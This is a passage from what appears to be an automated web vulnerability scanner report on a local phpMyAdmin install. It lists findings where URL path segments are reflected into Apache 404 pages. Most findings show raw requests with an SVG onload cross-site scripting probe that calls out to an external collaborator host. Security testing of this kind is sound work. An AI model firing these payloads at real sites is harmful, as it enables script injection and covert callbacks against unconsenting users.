Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//gvfjl2iai7b3n1oe0rppryyqqhwck4a3yvojl6bu0\56burpcollaborator.net'&gt;/js/messages.php was not found on this server.</p>
...[SNIP]...
19.250. http://localhost/phpmyadmin/js/messages.php [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/messages.php

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//wssziifqfn8jkhlux7m5oev6nxtshk7jvblzim9ay%5c56burpcollaborator.net'%3e/messages.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:26 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 422
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//wssziifqfn8jkhlux7m5oev6nxtshk7jvblzim9ay\56burpcollaborator.net'&gt;/messages.php was not found on this server.</p>
...[SNIP]...
19.251. http://localhost/phpmyadmin/js/messages.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/messages.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /phpmyadmin/js/messages.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2fqvptlcikihbdnboo01pzr8y0qrwmkeady5otig94y%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 425
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/messages.php/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//qvptlcikihbdnboo01pzr8y0qrwmkeady5otig94y\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.252. http://localhost/phpmyadmin/js/navigation.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/navigation.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//ra5u0dxlxiqe2c3pf24069d15sbnzfpjdb3zurhh56%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//ra5u0dxlxiqe2c3pf24069d15sbnzfpjdb3zurhh56\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.253. http://localhost/phpmyadmin/js/navigation.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/navigation.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//9eoc4v1310uw6u77jk8iarhj9af53xt1ht7h44usj%5c56burpcollaborator.net'%3e/js/navigation.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 415
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//9eoc4v1310uw6u77jk8iarhj9af53xt1ht7h44usj\56burpcollaborator.net'&gt;/js/navigation.js was not found on this server.</p>
...[SNIP]...
19.254. http://localhost/phpmyadmin/js/navigation.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/navigation.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//myopo8lglde9q7rk3xsvu41wtnzinade16ruohf54%5c56burpcollaborator.net'%3e/navigation.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 423
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//myopo8lglde9q7rk3xsvu41wtnzinade16ruohf54\56burpcollaborator.net'&gt;/navigation.js was not found on this server.</p>
...[SNIP]...
19.255. http://localhost/phpmyadmin/js/page_settings.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/page_settings.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//uvtxlgioilbhnfos05p3rcy4qvwqkib9z1ppgh37rw%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//uvtxlgioilbhnfos05p3rcy4qvwqkib9z1ppgh37rw\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.256. http://localhost/phpmyadmin/js/page_settings.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/page_settings.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//tgdw6f3n3kwg8e9rl4a2cbj3buhp5hw8k0ao7bxzm%5c56burpcollaborator.net'%3e/js/page_settings.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 418
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//tgdw6f3n3kwg8e9rl4a2cbj3buhp5hw8k0ao7bxzm\56burpcollaborator.net'&gt;/js/page_settings.js was not found on this server.</p>
...[SNIP]...
19.257. http://localhost/phpmyadmin/js/page_settings.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/page_settings.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//an1ddwa4a13xfvg8slhjjsqkibo6cy3prhh5es5gu%5c56burpcollaborator.net'%3e/page_settings.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 426
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//an1ddwa4a13xfvg8slhjjsqkibo6cy3prhh5es5gu\56burpcollaborator.net'&gt;/page_settings.js was not found on this server.</p>
...[SNIP]...
19.258. http://localhost/phpmyadmin/js/rte.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/rte.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//66a9wst0txmtyrz4bh0f2o9g1772vumpah05rxen2c%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//66a9wst0txmtyrz4bh0f2o9g1772vumpah05rxen2c\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.259. http://localhost/phpmyadmin/js/rte.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/rte.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//zy12olltlqemqkrx3as8uh19t0zvnnei2asyplf94%5c56burpcollaborator.net'%3e/js/rte.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 408
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//zy12olltlqemqkrx3as8uh19t0zvnnei2asyplf94\56burpcollaborator.net'&gt;/js/rte.js was not found on this server.</p>
...[SNIP]...
19.260. http://localhost/phpmyadmin/js/rte.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/rte.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//ej1h906865z1bzccopdnfwmoefka82zxnpdda01oq%5c56burpcollaborator.net'%3e/rte.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 416
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//ej1h906865z1bzccopdnfwmoefka82zxnpdda01oq\56burpcollaborator.net'&gt;/rte.js was not found on this server.</p>
...[SNIP]...
19.261. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/shortcuts_handler.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//eo6he0b8b541gzhctpinkwrojfpad254twjkacx2lr%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//eo6he0b8b541gzhctpinkwrojfpad254twjkacx2lr\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.262. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/shortcuts_handler.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//iqclg4dcd965i3jgvtkrm0tsljref678v0loib8zx%5c56burpcollaborator.net'%3e/js/shortcuts_handler.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 422
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//iqclg4dcd965i3jgvtkrm0tsljref678v0loib8zx\56burpcollaborator.net'&gt;/js/shortcuts_handler.js was not found on this server.</p>
...[SNIP]...
19.263. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/shortcuts_handler.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//2il58o5w5typanb0ndcbeklcd3jy7qzsnkd8av1jq%5c56burpcollaborator.net'%3e/shortcuts_handler.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 430
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//2il58o5w5typanb0ndcbeklcd3jy7qzsnkd8av1jq\56burpcollaborator.net'&gt;/shortcuts_handler.js was not found on this server.</p>
...[SNIP]...
19.264. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.jse2e5lyhral HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.jse2e5lyhral was not found on this server.</p>
...[SNIP]...
19.265. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//2555voswstlpxny0adzb1k8c036yuqpodg340rqff%5c56burpcollaborator.net'%3e/js/vendor/codemirror/addon/hint/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 443
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//2555voswstlpxny0adzb1k8c036yuqpodg340rqff\56burpcollaborator.net'&gt;/js/vendor/codemirror/addon/hint/show-hint.js was not found on this server.</p>
...[SNIP]...
19.266. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//devg4z1714u06y7bjo8mavhn9ef931yzmrcf920qp%5c56burpcollaborator.net'%3e/vendor/codemirror/addon/hint/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 451
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//devg4z1714u06y7bjo8mavhn9ef931yzmrcf920qp\56burpcollaborator.net'&gt;/vendor/codemirror/addon/hint/show-hint.js was not found on this server.</p>
...[SNIP]...
19.267. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor06u50hvy3c/codemirror/addon/hint/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor06u50hvy3c/codemirror/addon/hint/show-hint.js was not found on this server.</p>
...[SNIP]...
19.268. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirrork9q6etq9f3/addon/hint/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirrork9q6etq9f3/addon/hint/show-hint.js was not found on this server.</p>
...[SNIP]...
19.269. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 5]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 5 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon4mda4ggy07/hint/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:11 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon4mda4ggy07/hint/show-hint.js was not found on this server.</p>
...[SNIP]...
19.270. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 6]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 6 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/hint843am3lc2x/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
